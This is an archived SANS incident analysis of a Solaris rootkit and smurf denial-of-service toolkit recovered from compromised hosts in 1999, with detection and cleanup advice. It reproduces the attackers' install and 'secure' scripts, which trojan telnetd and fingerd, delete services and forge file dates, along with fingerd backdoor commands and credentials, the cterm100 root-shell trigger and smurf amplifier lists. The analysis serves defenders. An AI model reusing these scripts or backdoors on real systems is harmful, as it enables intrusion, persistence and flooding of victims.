|
|
|
|
 |
|
|
|
|
 |
 |
|
 |
|
|
| 分布式D.O.S攻击(三) (Other,其他) | | | | 涉及程序: | | 任何在线主机 | | | | 描述: | | Analysis of Rootkit/Smurf Payload Toolkit | | | | 详细: | Analysis of Rootkit/Smurf Payload Toolkit v 1.1
A number of systems here were compromised on or about 12/22/99. The primary targets were Solaris systems, however, Compaq (formerly DEC) and SGI IRIX systems were compromised as well. Prompt action by the local sysadmins prevented the hackers from running their cleanup scripts. Consequently, we were able to get the toolkit that they were using against us. I had seen some of these files in earlier breakins dating from 9/99 but wasn't able to piece it together until we got the toolkit.
The SANS Institute has been analyzing log entries in an attempt to see if TFN or Trinoo style attacks are in place. This toolkit contains components that are similar to what is in the TFN toolkit. I need to emphasize that what we found here is NOT TFN or Trinoo.
This past year that attackers have started to use distributed handler/agent technology for sniffers and DoS attacks, and covert channels for communication. ICMP is the most popular method of communication. This is the basis of the Trinoo or TFN attack tools.
This particular attack, while not as sophisticated as Trinoo or TFN, is just as capable of launching a automated Denial-of-Service attack against a target. While it's possible to launch the equivalent of a small scale TFN attack with the tools we found here, I'd classify this attack as a simple rootkit style attack with a DoS payload.
If you have any more information or insights, please send us a note to intrusion@sans.org.
The Attack
The hackers are using buffer overflow exploits on rpc.ttdbserverd, rpc.cmsd, sadmind, rpc.statd to gain root access to a machine. In some cases, they use a variant of the /tmp/bob attack which is associated with
the ffcore buffer overflow exploit. In any event, if they are successful in gaining access, they ftp the toolkit into a directory on the machine. Our past experience has revealed these dirs to be "...", ".. ", ".lib", /usr/lib/libsof4/... and /dev/cdrom, /dev/rmt/diskette. They install a backdoor into the system that gives them root access. IMHO, the machines are being set up for a later attack. The payload they deliver is a set of Solaris binaries. In at least one instance, they compromised a Compaq system and tried to run the Solaris binaries.
The toolkit replaces your current /etc/inetd.conf with a vanilla copy that opens up traffic to all of the TCP and UDP services. This effectively disables any TCP Wrappers running on your system.
The Solution
Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack. Solaris patches and patch reports are available from sunsolve.sun.com. Turning off all unnecessary services is another step to take. Installing tools like portsentry, logcheck and TCP Wrappers are a definite step in helping detect the probe or attack. Tripwire is the best tool for identifying which files on your system
have been modified.
Cleaning Up
Tripwire is the best way to find any trojan files that are on your system. It's a little time consuming to set up initially but worth it in situations like this. Search for hidden directories. Some of the names we've discovered in past breakins are "...", ".. " (dot-dot-space), ".lib", /dev/cdrom and /dev/rmt/diskette. Use the find command to search for these and here's a sample command: find / -name "..." -print will search for a file called "...". Search for the files shown in the toolkit.
Check your /usr/sbin/in.telnetd and /usr/sbin/in.fingerd filesizes and if it matches the size shown in the next section, then you've been trojaned.
You should sweep your system for Trinoo or TFN. The find_ddos utility supplied by www.nipc.gov is the best tool to use to sweep your system. It is available from www.fbi.gov/nipc/trinoo.htm.
The Tools
The name of the toolkit is solkit.tar and it contains the following items:
-rw-r--r-- 1 root root 2875 May 16 1999 bfile
-rw-r--r-- 1 root root 3036 Jul 2 1999 bfile2
-rw-r--r-- 1 root root 20118 Jul 2 1999 bfile3
-rwxr-xr-x 1 root root 114 Jul 2 1999 clean.sh
-rw-r--r-- 1 root root 3590 May 13 1999 finger.conf
-rwxr-xr-x 1 root root 21192 May 11 1999 hme
-rwxr-xr-x 1 root root 9684 Aug 16 16:15 in.fingerd
-rwxr-xr-x 1 root root 35412 Aug 16 16:15 in.telnetd
-rwxr-xr-x 1 root root 1062 Jul 2 1999 install
-rwxr-xr-x 1 root root 21184 May 11 1999 le
-rwxr-xr-x 1 root root 86 Jun 30 1999 script
-rwxr-xr-x 1 root root 1172 Jul 30 18:16 secure.sh
-rwxr-xr-x 1 root daemon 153600 Dec 28 16:34 solkit.tar
-rwxr-xr-x 1 root root 11520 May 13 1999 sunsmurf
-rwxr-xr-x 1 root root 10488 May 13 1999 syn
The tools are smurf style attack tools that are designed to allow the hackers to launch smurf-style attacks on unsuspecting targets.
Analysis
bfile*
These file are lists of IP network addresses of the form xxx.xxx.xxx.0 or xxx.xxx.xxx.255. These are the networks that supposedly will flood a victim host as a result of the smurf attack. This particular toolkit's list had 1848 IP network addresses. A subset of the IP addresses found in these files is shown below.
# more bfile
206.0.193.255
206.1.32.255
206.2.50.255
206.3.159.255
206.4.97.255
206.5.81.255
206.6.125.255
206.7.195.255
206.9.168.255
206.12.90.255
206.13.40.255
clean.sh
# removes our files
rm -rf solkit.tar
rm -rf secure.sh
rm -rf install
rm -rf clean.sh
echo "=> clean0red!! heh. "
As you can see from the above commands, this script cleans up the loose ends after the toolkit is installed.
finger.conf
This file is really a stripped down /etc/inet/inetd.conf file. It allows telnetd, ftp, the standard r-commands, uucp, finger and the standard UDP based protocols (chargen, etc.). Here, the attackers disable any TCP wrappers that may be running on the system. Also, the in.telnetd and in.fingerd programs are trojans and will be discussed later in this page.
#
#ident "@(#) inetd.conf 1.22 95/07/14 SMI" /* SVr4.0 1.5 */
#
#
# Configuration file for inetd(1M). See inetd.conf(4).
#
# To re-configure the running inetd process, edit this file, then
# send the inetd process a SIGHUP.
#
# Syntax for socket-based Internet services:
#
#
# Syntax for TLI-based Internet services:
#
# tli
#
# Ftp and telnet are standard Internet services.
#
ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd
telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
#
# Tnamed serves the obsolete IEN-116 name server protocol.
#
name dgram udp wait root /usr/sbin/in.tnamed in.tnamed
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind
exec stream tcp nowait root /usr/sbin/in.rexecd in.rexecd
comsat dgram udp wait root /usr/sbin/in.comsat in.comsat
talk dgram udp wait root /usr/sbin/in.talkd in.talkd
#
# Must run as root (to read /etc/shadow); "-n" turns off logging in utmp/wtmp.
#
uucp stream tcp nowait root /usr/sbin/in.uucpd in.uucpd
#
# Tftp service is provided primarily for booting. Most sites run this
# only on machines acting as "boot servers."
#
#tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd
-s /tftpboot
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
finger stream tcp nowait root /usr/sbin/in.fingerd in.fingerd
^^^^ |--This is what makes the finger trojan work
#systat stream tcp nowait root /usr/bin/ps ps -ef
#netstatstream tcp nowait root /usr/bin/netstat netstat -f inet
#
# Time service is used for clock synchronization.
#
time stream tcp nowait root internal
time dgram udp wait root internal
#
# Echo, discard, daytime, and chargen are used primarily for testing.
#
echo stream tcp nowait root internal
echo dgram udp wait root internal
discard stream tcp nowait root internal
discard dgram udp wait root internal
daytime stream tcp nowait root internal
daytime dgram udp wait root internal
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
#
#
# RPC services syntax:
#
#
# can be either "tli" or "stream" or "dgram".
# For "stream" and "dgram" assume that the endpoint is a socket descriptor.
# can be either a nettype or a netid or a "*". The value is
# first treated as a nettype. If it is not a valid nettype then it is
# treated as a netid. The "*" is a short-hand way of saying all the
# transports supported by this system, ie. it equates to the "visible"
# nettype. The syntax for is:
# *| |{[,]}
# For example:
#
# Solstice system and network administration class agent server
#
# Rquotad supports UFS disk quotas for NFS clients
#
#
# The rusers service gives out user information. Sites concerned
# with security may choose to disable it.
#
#
# The spray server is used primarily for testing.
#
#
# The rwall server allows others to post messages to users on this machine.
#
#
# Rstatd is used by programs such as perfmeter.
#
#
# The rexd server provides only minimal authentication and is often not run
#
#
# by files in /var/spool/calendar
#
#
# Sun ToolTalk Database Server
#
#
# UFS-aware service daemon
#
#
# Sun KCMS Profile Server
#
#
# Sun Font Server
#
fs stream tcp wait nobody /usr/openwin/lib/fs.auto fs
hme, le
These programs are a variant of esniff.c and are compiled for the Sun hme and le network interfaces. In the past, we discovered that this program is sometimes called "update". A "strings hme" command produces the following output:
rlogin
telnet
smtp
-- TCP/IP LOG -- TM: %s --
PATH: %s(%s) =>
%s(%s)
STAT: %s, %d pkts, %d bytes [%s]
DATA:
:
(%d)
PKT: (%s %04X)
%s[%s] =>
%s[%s]
DATA LIMIT
TH_FIN
TH_RST
IDLE TIMEOUT
SIGNAL
Log ended at => %s
sigalrm: TIMEOUT
%s: alarm
%s: getmsg
%s: MORECTL|MOREDATA
%s: MORECTL
%s: MOREDATA
getmsg: control portion length < sizeof (long): %d
unexpected dlprim error
dlattachreq: putmsg
dlokack
dlokack: response ctl.len too short: %d
dlokack: DL_OK_ACK was not M_PCPROTO
dlokack: short response ctl.len: %d
dlbindreq: putmsg
dlbindack
dlbindack: DL_OK_ACK was not M_PCPROTO
dlbindack: short response ctl.len: %d
dlpromiscon: putmsg
/dev/hme
DLIOCRAW
bufmod
push bufmod
SBIOCSTIME
SBIOCSCHUNK
I_FLUSH
finished getmsg() = %i
c6Lqd3Dvn2l3s <----This appears to be an encrypted password string (osmium1)
(%s)UP?
Output file cant be opened
filtering out smtp connections.
filtering out telnet connections.
filtering out rsh/rlogin connections.
filtering out ftp connections.
Usage: %s [-d x] [-s] [-f] [-l] [-t] [-i interface] [-o file]
-d int set new data limit (128 default)
-s filter out smtp connections
-f filter out ftp connections
-l filter out rlogin/rsh connections
-t filter out telnet connections
-o <file> output to <file>
Using logical device %s [%s]
Output to %s.%s%s
stdout
(debug)
Backgrounding
[Cannot bg with debug on]
Log started at => %s [pid %d]
in.fingerd
We were able to obtain the source code for this trojan type. Thanks to Mr. F. for providing it to us. See www.sans.org/y2k/fingerd.htm for a detailed description of the source code.
The comments below give a brief description of how the trojan works.
/* bleah, this is a trapdoor replacement for a standard /usr/etc/in.fingerd
* or /sbin/fingerd or whatever.. it should work on most systems i guess with
* a few minor adjustments of the paths... *BUT* in order for it to work
* it must run as root, so you have to change the following like in
* /etc/inetd.conf
* finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
* to look like this:
* finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd
* ^^^^ - THIS IS WHAT YOU CHANGE
* NOTE: if the system is running xinetd, you have to change the entry
* in /etc/xinetd.conf - i'll leave that up to you, it's a different
* format, but doesn't take a rocket scientist to figure out
* to find if the site is running xinetd or inetd, simply:
* grep inetd /etc/rc
*
* CREDITS:
* - I used the source for 'Zap2' or something silly for the cloak stuff
* - As you can see i used the BSD fingerd source
* - I got the idea for this from something Panzer Boy said once to me.
* - I wrote the rest of the code.
* - Tested for me by max-q - i didn't want to break any of my systems ;]
* - I heard that someone else did something like this before, but i never
* saw it so i figured i'd distribute this..
*
* HOW IT WORKS:
* How this program works is that you can send a remote site commands
* by fingering certain users.. i've made up a set of userid's that each
* perform a separate command... these are trivial to change, just look
* for the definition, and change it.. woo woo.. the default userid's
* are:
* cmd_adduser - add special user to the passwd file (if it doesn't exist)
* cmd_stealth - 'cloak' the special user (remove from utmp, and wtmp)
* cmd_deluser - delete the special user from the passwd file
* cmd_rootsh - create the root shell
* cmd_cleanup - delete the special user and erase the root shell.
*
* NOTES:
* Don't be stupid, most sites run tcp wrappers now adays, check for
* your logs in /usr/adm/messages /usr/adm/syslog or any log file
* in /etc/syslog.conf that looks like it might contain wrapper logs
*
* TO COMPILE:
* cc -s -o fingerd fingerd.c
* NOTE: This program was written for sunos 4.1.3_U1, so for any other
* platform paths and maybe some code may need to be changed..
* if you can figure out how, you shouldn't be playing with this
* program.
* FOR LINUX:
* cc -s -DLINUX -o fingerd fingerd.c
*
* MORE NOTES:
* I got the idea for this program from something panzer boy told me he
* did once, i dunno if this was what he said, i forgot already, but
* it was something like this and i thought it would be fun to write, so
* here it is..
*
* The login user created when you finger cmd_adduser is 'haqrbob'
* with the password 'IBl0G0atz' - if you don't like this, change
* the #defines.. - note that this account does not has root priv's
* this is incase the site has root logins dissabled on certain tty's
* (no secure field in /etc/ttytab) - just log into the account, and
* then create a root shell...
*
* That's about it..
* - pluvius@dhp.com - note, io.org starting charging money for accounts
* instead of being free.. so you can't email me there.
* pluvius@dhp.com will do for now until i get an
* account somewhere that i don't care if it gets
* hacked, and that has a reliable connection (>=t1)
* send me your feedback, patches for other O/S's or whatever the hell
* you want.
*/
A strings output of the file produces the following output:
getpeername
cterm100
finger
pipe
/usr/bin/finger
No local finger program found
fork
fdopen
/bin/sh
update
%s:
in.telnetd
This is a trojan as well. This trojan requires that you set your term to cterm100. If you do that and telnet to the victim, you'll get a root shell prompt. If your TERM is set to anything else, you get the standard telnet prompt. A sample session is shown next.
# Here we have a standard terminal definition
%printenv TERM
%xterm
%telnet test
Trying xxx.xxx.xxx.xxx...
Connected to xxx.edu.
Escape character is '^]'.
UNIX(r) System V Release 4.0 (xxx.edu)
login:
telnet> close
Connection closed.
Snoop output confirms it's a normal telnet session.
test.edu# snoop port 23
Using device /dev/le (promiscuous mode)
vt.edu -> test.cc.vt.edu TELNET C port=56969
test.vt.edu -> discovery.cc.vt.edu TELNET R port=56969
vt.edu -> test.cc.vt.edu TELNET C port=56969
vt.edu -> test.cc.vt.edu TELNET C port=56969
testvt.edu -> vt.edu TELNET R port=56969
test.vt.edu -> vt.edu TELNET R port=56969
vt.edu -> test..edu TELNET C port=56969
vt.edu -> test.edu TELNET C port=56969
test.edu -> vt.edu TELNET R port=56969
vt.edu -> test.vt.edu TELNET C port=56969
test.edu ->vt.edu TELNET R port=56969
vt.edu -> test.edu TELNET C port=56969 \377\372\30\0XTERM\377\360\377\372#\0disco
test.edu -> vt.edu TELNET R port=56969 \r\n\r\nUNIX(r) System V
vt.edu -> test.vt.edu TELNET C port=56969
test.edu -> vt.edu TELNET R port=56969 \377\373\1\377\375\1login:
vt.edu -> test.vt.edu TELNET C port=56969
test.edu ->vt.edu TELNET R port=56969
vt.edu -> test.edu TELNET C port=56969
Now, we set term to cterm100 and telnet into the system again.
set term=cterm100
vt.edu# printenv TERM
cterm100
vt.edu# telnet victim.host
Trying xxx.xxx.xxx.xxx...
Connected to test.vt.edu.
Escape character is '^]'.
UNIX(r) System V Release 4.0 (victim.host)
# hostname
victim.host
#
Snoop output shows the following:
Using device /dev/le (promiscuous mode)
vt.edu -> test.vt.edu TELNET C port=56970
test.vt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.edu TELNET C port=56970
vt.edu -> test.vt.edu TELNET C port=56970
test.vt.edu ->vt.edu TELNET R port=56970
testpurch.cc.vt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.vt.edu TELNET C port=56970
test.vt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.vt.edu TELNET C port=56970
vt.edu -> test.vt.edu TELNET C port=56970
test.vt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.vt.edu TELNET C port=56970
\377\372\30\0CTERM100\377\360\377\372#\0di
test.vt.edu -> vt.edu TELNET R port=56970
\r\n\r\nUNIX(r) System V
vt.edu -> test.vt.edu TELNET C port=56970
test.vt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.vt.edu TELNET C port=56970
testvt.edu -> vt.edu TELNET R port=56970
vt.edu -> test.vt.edu TELNET C port=56970
No login prompt or password is required. We are starting to see a number of trojans that are activated if you come from an 'authorized' source port or if your TERM is set correctly. In this case, your TERM must be cterm100 in order to activate the trojan. There are similar trojans that require the TERM to be set to vt350, VT100, ansi-term. This TERM requirement can be changed to match anything.
lsof examination of the in.telnetd process shows nothing special about the trojan. As far as we can tell, there is no "secret" logging being done by the trojaned in.telnetd.
Here is the 'strings' output of the file.
SunOS 5.7
SunOS 5.6
UNIX(r) System V Release 4.0 (
netibuf malloc failed
telnetd
%s:
getpeername
setsockopt (SO_KEEPALIVE): %m
setsockopt (SO_OOBINLINE): %m
ttloop: read: %m
ttloop: peer died: %m
/dev/ptmx
open /dev/ptmx
could not grant slave pty
could not unlock slave pty
could not enable slave pty
could not open slave pty
ptem
ioctl I_PUSH ptem
ldterm
ioctl I_PUSH ldterm
ttcompat
ioctl I_PUSH ttcompat
ioctl TIOCGETP pty t: %m
ioctl TIOCSETN pty t: %m
ioctl TIOCGETP pty pty: %m
ioctl TIOCSETN pty pty: %m
cterm100
sockmod
ioctl I_POP sockmod
telmod
ioctl I_PUSH telmod
readstream failed
/dev/logindmux
open /dev/logindmux
ioctl I_LINK of /dev/ptmx failed
ioctl I_LINK of tcp connection failed
fstat ptmfd failed
ioctl LOGDMX_IOC_QEXCHANGE of netfd failed
fstat netfd failed
ioctl LOGDMX_IOC_QEXCHANGE of ptmfd failed
fork
TERM
.telnet
in.telnetd:
makeutx failed
/bin/login
login
/bin/sh
update
telnetd: %s.
telnetd: %s
%s: %s
select
ioctl FIONBIO net: %m
ioctl FIONBIO pty p: %m
TEL_IOC_MODE binary has changed
ioctl TEL_IOC_MODE failed
ioctl I_NREAD failed
ioctl TEL_IOC_ENABLE
failed
ioctl TEL_IOC_GETBLK failed
[Yes]
ioctl TIOCGLTC: %m
ioctl TIOCGETP: %m
telnetd: panic state=%d
DISPLAY
ioctl TIOCSETN: %m
in.telnetd
in.telnetd: ia_start failure
I_NREAD returned error %m
netibuf realloc failed
getmsg returned -1, errno %d
no data or protocol element recognized
read %d bytes
TERM=
install
This is the installation script used in the toolkit. Here's what it does.
#
# solaris kit installer - relapse
#
One should never write a script without telling people how to use the script :-).
if [ $# != 1 ]; then echo "=> solaris kit installer -
relapse" echo "=> usage: ./install " exit fi echo "=> $1 will
be the working dir" echo "=> sleeping for 5 seconds if the dir is wrong
ctrl-c now." sleep 5
Start the actual installation process by creating the directories and copying the files to their final resting places.
echo "=> making directories..."
mkdir $1/...
echo "=> moving sniffers and dos programs..."
mv hme $1/...
mv le $1/...
mv sunsmurf $1/...
mv syn $1/...
mv bfile* $1/...
We install the telnetd trojan by removing the real binary and replacing it with the trojan telnetd described in the previous section.
echo "=> backdooring telnetd..."
chmod +x in.telnetd
rm -rf /usr/sbin/in.telnetd
mv in.telnetd /usr/sbin Grab the PID of the inet process for later.
inetpid=`ps -eaf |grep inetd |grep -v "grep inetd" | awk '{ print $2 }'`
echo "=> the pid of inetd is $inetpid - if this is wrong ctrl-c now."
sleep 5
Install the fingerd trojan. We don't know what it does yet. Once we do that, we restart the inetd process so it uses the replaced /etc/inetd.conf
echo "=> backdooring fingerd..."
chmod +x in.fingerd
rm -rf /usr/sbin/in.fingerd
mv in.fingerd /usr/sbin
mv finger.conf /etc/inetd.conf
kill -9 $inetpid
/usr/sbin/inetd -s
We try to hide our tracks by playing with the modification dates. This is sorta silly since every file in the dirs will have the same date. /etc and /usr/sbin are the target directories.
echo "=> changing file dates..."
touch 0502111196 /usr/sbin/*
touch 0502111196 /etc/*
We'll discuss secure.sh later. But here we mark the machine as our own so no other hacker can break into it. We do this by removing certain files like rpc.ttdbserverd, statd, etc.
echo "=> shelling to secure script.
chmod +x secure.sh
./secure.sh
Here we delete the install kit files.
echo "=> cleaning up..."
./clean.sh
script
This is a simple script that gets the PID of the inetd process.
inetpid=`ps ax |grep inetd |grep -v "grep inetd" | awk '{ print $2 }'`
echo $inetdpid
secure.sh
This is one of the cleanup scripts used in the install program. Frankly, the only reason I see for using this
script is to prevent other hackers from taking over this machine. It leaves a nice hole that tells a sysadmin
that there is a problem.
#!/bin/sh
#
# secure script to secure some basic shit
#
This script is designed to run on Solaris only.
if [ `uname` != SunOS ]; then
echo "#: sorry, but wtf are you doing?"
exit 0
fi
Grab some PID numbers for the statd, nlock and rpcbind processes for later processing.
# defining stuff.
# ansi-
# pid numbers
STATD=`ps -eaf |grep statd |grep -v "grep statd" | awk '{
print $2 }'`
NLOCK=`ps -eaf |grep nlock |grep -v "grep nlock" | awk '{
print $2 }'`
BIND=`ps -eaf |grep rpcbind |grep -v "grep rpcbind" | awk '{
print $2 }'`
# ok securing.
echo "#: securing."
echo "#: 1) changing modes on local files."
echo "#: will add more local security later. "
This is interesting. Just in case a sysadmin finds the backdoors, we leave a hole into the system by opening up the ufsrestore hole. There is a patch for this. I guess they assume you wouldn't look here since it was fixed.
chmod -s /lib/fs/ufs/ufsrestore
Let's remove the rpc.X stuff from /etc/inetd.conf just to make sure those services don't start up again by accident.
cat /etc/inetd.conf |grep -v "ttdb" |grep -v
"nlock" |grep -v "rpc" >> /etc/ine ; mv /etc/ine /et
c/inetd.conf
echo "#: 2) remote crap like rpc.status , nlockmgr etc.."
Kill the running statd and rpcbind processes if they're running.
kill -9 $STATD
kill -9 $BIND
echo "#: 4) removing them so they ever start again!"
Remove the files so they can't be used against us. Talk about marking yourterritory.....:-)
cat /etc/rpc | grep -v status >>/tmp/bah ; mv /tmp/bah/etc/rpc
rm -rf /usr/lib/nfs/statd
rm -rf /etc/init.d/nfs.client
rm -rf /usr/sbin/rpcbind
rm -rf /usr/dt/bin/rpc.ttdbserverd
Create zero length files using the same filenames. Works if all you do is a plain ls and not an ls -l.
touch /usr/lib/nfs/statd
touch /usr/dt/bin/rpc.ttdbserverd
touch /usr/sbin/rpcbind
touch /etc/init.d/nfs.client
echo "5) secured."
sunsmurf
This is appears to be a variant of the smurf.c program originally written by TFreak. It is a Solaris port.
The toolkit only had the binary. I haven't been able to locate the source for it. A strings output of the binary
follows.
can't find %s
opening bcast file
ERROR: no broadcasts found in file %s
ERROR: packet size must be < 1024
getting socket
Flooding %s (. = 25 outgoing packets)
[1;31msunsmurf.c
[0m by
[1;34mmercs
[0m - ported into SunOS 5.x.x
[Based on smurf.c by TFreak] - 99% of the credit goes to him
DO NOT DISTRIBUTE!
[0;37m
usage: %s [target] [bcast file] [packets] [delay] [size]
target = address to hit
bcast file = file to read broadcast addresses from
packets = number of packets to send (0 = flood)
delay = wait between each packet (in ms)
size = size of packet (<: 1024)
Done!
$Id smurf.c,v 5.0 1998/05/28 2:59:35 EST mercs Exp $
syn
Apparently this program simply sends a SYN packet to the target from a spoofed
source. It will send the SYN packet to a range of ports on the target. Here's the
strings output of this binary.
[JSignal Caught. Exiting Cleanly.
[JSegmentation Violation Caught. Exiting Cleanly.
Unknown host %s
Error sending syn packet.
[1;30m[
[1;31m%c
[1;30m]
[0m %d
shelley.c by mercs
use: %s [srcaddr] [dstaddr] [low port] [high port]
random addresses will be used if srcaddr is 0
socket (raw)
socket
%i.%i.%i.%i
High port must be greater than Low port.
<< Back to GIAC
Home | Events | Publications | Security Digests
Resources | Miscellaneous | Contact SANS
?1999 SANS Institute : Office 301.951.0102 : Registration 719.599.4303 : Web Contact scott@sans.org
| | | | 解决方案: | | 动态的IDS检测防御系统 | | | | 发布时间:2000年2月7日 | 返回 | | 版权所有,如需转载,请与安络联系 |
|
|
|
|
|
|
|
|
|
